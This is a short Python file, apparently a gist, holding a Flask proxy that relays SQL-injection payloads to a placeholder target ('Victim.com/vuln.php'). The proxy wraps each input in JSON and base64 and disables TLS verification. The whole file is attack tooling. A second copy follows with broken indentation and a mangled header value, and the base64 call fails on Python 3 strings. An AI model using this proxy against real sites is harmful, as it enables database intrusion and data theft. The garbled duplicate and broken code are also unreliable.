amriunix/proxy.py

## proxy.py
#!/usr/bin/python3

from flask import Flask, request
import requests
import base64
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

URL = 'http://Victim.com/vuln.php'
Host = 'Victim.com'

app = Flask(__name__)
@app.route('/path/to/attack', methods=['GET', 'POST'])
def sqli():

    header = {
    'Host': '{}'.format(Host),
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    }
    vulnParm = request.form['vulnParm']
    data = '{"vulnParm" : "' + vulnParm + '"}'
    payload = base64.b64encode(data)

    r = requests.post(URL, data = payload, headers=header, verify=False)
    result = r.content

    return result, 200

if __name__ == "__main__":
    app.run(host='0.0.0.0', debug=True)
	#!/usr/bin/python3

	from flask import Flask, request
	import requests
	import base64
	requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

	URL = 'http://Victim.com/vuln.php'
	Host = 'Victim.com'

	app = Flask(__name__)
	@app.route('/path/to/attack', methods=['GET', 'POST'])
	def sqli():

	header = {
	'Host': '{}'.format(Host),
	'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
	'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8',
	'Accept-Language': 'en-US,en;q=0.5',
	'Accept-Encoding': 'gzip, deflate',
	'Content-Type': 'application/x-www-form-urlencoded',
	}
	vulnParm = request.form['vulnParm']
	data = '{"vulnParm" : "' + vulnParm + '"}'
	payload = base64.b64encode(data)

	r = requests.post(URL, data = payload, headers=header, verify=False)
	result = r.content

	return result, 200

	if __name__ == "__main__":
	app.run(host='0.0.0.0', debug=True)